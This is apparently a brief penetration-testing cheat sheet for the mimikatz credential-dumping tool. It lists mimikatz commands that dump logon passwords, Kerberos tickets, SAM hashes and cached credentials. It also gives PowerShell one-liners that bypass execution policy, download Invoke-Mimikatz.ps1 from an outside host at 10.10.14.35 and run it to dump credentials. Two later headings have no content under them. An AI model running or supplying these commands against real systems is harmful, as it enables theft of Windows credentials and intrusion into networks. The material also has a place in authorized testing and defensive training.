mimikatz

Basic Commands

# Lists all available provider credentials. 
# This usually shows recently logged on user and computer credentials

CMD> mimikatz.exe 
mimikatz # privilege::debug 
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets 

# List all SAM info

mimikatz # token::elevate
mimikatz # lsadump::sam
mimikatz # lsadump::cache 

# Powrshell based mimikatz
CMD> powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.35/post/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

PS> IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.35/post/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds

Output to Kali

Procdump to mimikatz

Last updated